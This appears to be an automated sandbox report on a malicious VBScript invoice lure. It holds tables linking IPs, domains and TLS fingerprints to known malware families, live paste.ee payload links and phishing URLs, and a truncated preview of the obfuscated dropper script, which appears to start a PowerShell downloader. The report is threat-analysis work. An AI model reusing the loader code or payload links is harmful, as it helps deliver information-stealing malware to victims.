                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, l-0003.l-msedge.net, ocsp.digicert.com, db-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, odc-db-files-geo.onedrive.akadns.net, sls.update.microsoft.com, odc-db-files-brs.onedrive.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6236 because it is empty
                                                                                                                                                                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • VT rate limit hit for: Signed Proforma Invoice 3645479_pdf.vbs

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        21:11:16API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                        21:11:53API Interceptor695x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                        21:12:14API Interceptor2276462x Sleep call for process: colorcpl.exe modified

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        172.67.187.200EWW.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • paste.ee/d/gFlKP
                                                                                                                                                                                                                        ODC#PO 4500628950098574654323567875765674433##633.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • paste.ee/d/JxxYu
                                                                                                                                                                                                                        Purchase Order PO0193832.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • paste.ee/d/Bpplq
                                                                                                                                                                                                                        Name.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • paste.ee/d/0kkOm
                                                                                                                                                                                                                        517209487.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • paste.ee/d/s0kJG
                                                                                                                                                                                                                        screen_shots.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • paste.ee/d/GoCAw
                                                                                                                                                                                                                        66432890.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • paste.ee/d/D6Uw6
                                                                                                                                                                                                                        96874650.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • paste.ee/d/yj4hE
                                                                                                                                                                                                                        1e#U041e.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                        • paste.ee/d/QkK2f
                                                                                                                                                                                                                        751652433.vbsGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                        • paste.ee/d/0BSaJ
                                                                                                                                                                                                                        13.107.139.11ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                          20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                                                            20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                              disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                Oeyrmdo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                  z15ORDERBR2024-B001054840.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    FT-3-TL-BALANCE,jpg.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                                                                      PO3488-0337.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                                                                        https://1drv.ms/f/s!Ah3RUujFpGTrbZcZBXk_HMFtmRQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          CONFIRMATION ORDER0.batGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                            104.21.45.138F723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                              DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                  SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                    F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                                                                                                                                      F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                                                                                                                                        Price Quotation_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                          5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                            yDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                              DETAILS.docx.docGet hashmaliciousRemcosBrowse

                                                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                paste.eeF723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                Payment Advice for Invoice 2024 0904.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                Price Quotation_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                yDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                dual-spov-0006.spov-msedge.netORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                • 13.107.137.11
                                                                                                                                                                                                                                                                20240416-703661.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                20240416-703661.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                disktop.pif.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                https://1drv.ms/o/s!AhT23e1MofOfpnjbpE9m51fOcII5?e=K3DPPGGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 13.107.137.11
                                                                                                                                                                                                                                                                Oeyrmdo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                                • 13.107.137.11
                                                                                                                                                                                                                                                                Oeyrmdo.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                                                                                • 13.107.137.11
                                                                                                                                                                                                                                                                Payment Remittance Advice_000000202213.xlsbGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.137.11
                                                                                                                                                                                                                                                                z15ORDERBR2024-B001054840.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                bg.microsoft.map.fastly.netorder & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                https://msteams.link/WK80Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                https://watsonpropertyllc.formstack.com/forms/staffGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                http://www.traininng.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                https://cionfacttalleriproj.norwayeast.cloudapp.azure.com?finanzas.busqueda?q=Secretar%C3%ADa+de+Administraci%C3%B3n+y+Finanzas?30337974_3097_705331937556-157889157889770732479410588494105884Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 199.232.214.172
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win64.Trojan.Agent.ASGXPI.7352.29283.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 199.232.210.172
                                                                                                                                                                                                                                                                uploaddeimagens.com.brF723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                F873635427.vbsGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                Payment Advice for Invoice 2024 0904.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                • 172.67.215.45
                                                                                                                                                                                                                                                                Price Quotation_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                yDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 104.21.45.138

                                                                                                                                                                                                                                                                ASNs

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                CLOUDFLARENETUSF723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                                                CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 172.67.175.222
                                                                                                                                                                                                                                                                SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.21.74.5
                                                                                                                                                                                                                                                                Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                https://msteams.link/WK80Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                • 104.21.80.104
                                                                                                                                                                                                                                                                https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 104.21.95.175
                                                                                                                                                                                                                                                                Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                                                                                VNPT-AS-VNVNPTCorpVNvlxx.arm7-20240418-1854.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 14.225.219.227
                                                                                                                                                                                                                                                                vlxx.x86-20240418-1853.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                                • 14.225.219.227
                                                                                                                                                                                                                                                                Vedtb2CYvY.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 113.163.181.117
                                                                                                                                                                                                                                                                2x6j7GSmbu.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                • 203.161.50.129
                                                                                                                                                                                                                                                                hYN45tzxwl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 113.181.0.185
                                                                                                                                                                                                                                                                MY69DoYgp5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 14.236.143.111
                                                                                                                                                                                                                                                                x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 222.252.74.206
                                                                                                                                                                                                                                                                Specifications_0123jpg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                • 202.92.7.88
                                                                                                                                                                                                                                                                cx9Nvpe3Cs.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 14.166.94.254
                                                                                                                                                                                                                                                                16rBksY5gH.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                • 222.252.9.213
                                                                                                                                                                                                                                                                CLOUDFLARENETUSF723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                                                CTM REQUEST BIRTHSHIP.docGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 172.67.175.222
                                                                                                                                                                                                                                                                SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.26.13.205
                                                                                                                                                                                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 104.21.74.5
                                                                                                                                                                                                                                                                Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.21.84.67
                                                                                                                                                                                                                                                                https://msteams.link/WK80Get hashmaliciousPhisherBrowse
                                                                                                                                                                                                                                                                • 104.21.80.104
                                                                                                                                                                                                                                                                https://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 104.21.95.175
                                                                                                                                                                                                                                                                Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 104.20.3.235
                                                                                                                                                                                                                                                                MICROSOFT-CORP-MSN-AS-BLOCKUShttps://www.canva.com/design/DAGCxF7mFTo/x_4mk65cpl5G5aJF2UYVbw/view?utm_content=DAGCxF7mFTo&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.96.165.34
                                                                                                                                                                                                                                                                https://watsonpropertyllc.formstack.com/forms/staffGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.246.40
                                                                                                                                                                                                                                                                https://znixulyp.com/vGgw6oGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 13.107.213.40
                                                                                                                                                                                                                                                                https://huntingtonoakmont-my.sharepoint.com/:b:/g/personal/cmariotti_oakmontcommunities_com/EeUv57weU1BKhs36H3rF_G0BHM4kTzJShI_ZPwFvp1P7-g?e=4UASJ5Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.107.247.70
                                                                                                                                                                                                                                                                http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.96.173.162
                                                                                                                                                                                                                                                                https://t.airgears.org/r/?resource=120958450/4d9ac80/2a1170&e=dYRtX3NhcXBhbXduQUFjYW4kb26DYXK0LWQzJnV0bW9zb3WyY3V9YWNkJnV1bV9uAWRpdZ09ZW1ibWwmd39udW09OUT3MTNwMzQzMUYmd391cj0zJm1pX4U9eW5kZWApbmVlJmNpZD2yYURNNzV0NDgmYnlkPUE2MjBzN&ref_=1wy&ref=98k/&u=4jj4/&eid=xekc6v/DU5MjEnc2VoY29lZT11cmRlZnluZWQ&s=obI3r-q7de3Me3nnN3cpKfiix7CULJmXF7FuunFtjSxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.246.41
                                                                                                                                                                                                                                                                https://assets-gbr.mkt.dynamics.com/63445ada-d6fc-ee11-9046-002248c656ac/digitalassets/standaloneforms/4f16ddf0-7afd-ee11-a1fe-000d3ad499faGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 20.90.131.0
                                                                                                                                                                                                                                                                notepad.txtGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.96.189.2
                                                                                                                                                                                                                                                                https://u2355257.ct.sendgrid.net/ls/click?upn=u001.4YkCuNYTF3S1epm9KijHzHFfZe6RGn3F0umQQjG6fIb5h6U0n3Lap6J1hKqXi7Fiss-2Fnjz-2BcFRXpypvRmmfgWqO0slZGlTTOeSsAA0pI8tdrm-2F1TCZGVrUbz-2Fug83KSKfjVn_Ft8eY2PHa1awfrORAsIR9w84lhfuPmqFjQmDsVAH8hyK2jxcX4jAHKq6a8hoGITMOqGD3YxOAS6UCxAb-2BxR3uPyYHHRtPZbwpb00CqcBOzR0Iu2K8fB1VT-2Bkwb9kHAJPdhdLZAJG1dWDxv-2F3y0btEt8yJNPNzau03REICjJd-2BfU8x2dosq7VBZS-2BuuDa4hO6i8I2R8aw54LzuuGTyfjItw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 13.107.213.41
                                                                                                                                                                                                                                                                rapport.docx_POH.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.246.51

                                                                                                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eF723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                pQTmpNQX2u.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                RFQ Img_Quotation PO 202400969 - HESSEN TECH_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                SA162.pdf.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 13.107.139.11
                                                                                                                                                                                                                                                                • 104.21.45.138
                                                                                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19F723838674.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                order & specification.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                SHIPPING DOCUMENTS_PDF..vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                zHsIxYcmJV.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                Cheater Pro 1.6.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                Cheat Lab 2.7.2.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                • 172.67.187.200

                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\K2No9[1].txt

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (11695), with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):13769
                                                                                                                                                                                                                                                                Entropy (8bit):4.724051688607516
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Q9on1dVIsJfJvpDIkPAd+mUaGPCi3rLR+H+W+REzVpPgRhVN5bj4uLOwPG:VVVZtpDnAgvaGKi3rLRNFuVmP9OP
                                                                                                                                                                                                                                                                MD5:4CFA8B0F2BC26FF23C6C5FCEA830C95B
                                                                                                                                                                                                                                                                SHA1:40F7A9E809B95D4C49EA385534A8731892634EDA
                                                                                                                                                                                                                                                                SHA-256:D8528A06750DA01A8AB54115DDACFE893CC8C0416994D08B6003482610E8649D
                                                                                                                                                                                                                                                                SHA-512:4C0770774C7EFB978CC1DD01A0D019218ABFBCE4FC270AF2F34685E5705872250C7532EDF040E851EE21028588E648E60C1A9B0A5A619CE50F3C4FC2097ECED5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                Preview:.. dim ovarista , caleceiro , tangendo , ladrilho , trapalhona , Cama , trapalhona1.. caleceiro = " ".. tangendo = "" & ladrilho & caleceiro & ladrilho & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & ladrilho & caleceiro & ladrilho & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & ladrilho & caleceiro & ladrilho & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & ladrilho & caleceiro & ladrilho & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & ladrilho & caleceiro & ladrilho & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & ladrilho & caleceiro & ladrilho & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & ladrilho &

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                                                                Entropy (8bit):1.1940658735648508
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Nlllulp77th:NllU
                                                                                                                                                                                                                                                                MD5:7B5F360646F3167812DC4ADF7B166512
                                                                                                                                                                                                                                                                SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                                                                                                                                                                                                                                                                SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                                                                                                                                                                                                                                                                SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:@...e.................................x..............@..........

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\DB1

                                                                                                                                                                                                                                                                Download File
